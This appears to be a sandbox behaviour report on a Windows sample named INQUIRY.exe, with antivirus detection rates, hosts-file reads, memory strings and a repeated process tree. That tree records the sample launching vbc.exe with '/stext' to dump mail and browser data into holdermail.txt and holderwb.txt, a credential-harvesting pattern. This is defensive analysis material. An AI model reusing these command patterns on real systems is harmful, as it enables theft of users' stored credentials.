                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: INQUIRY.exeVirustotal: Detection: 43%
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: INQUIRY.exeVirustotal: Detection: 43%
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile read: C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
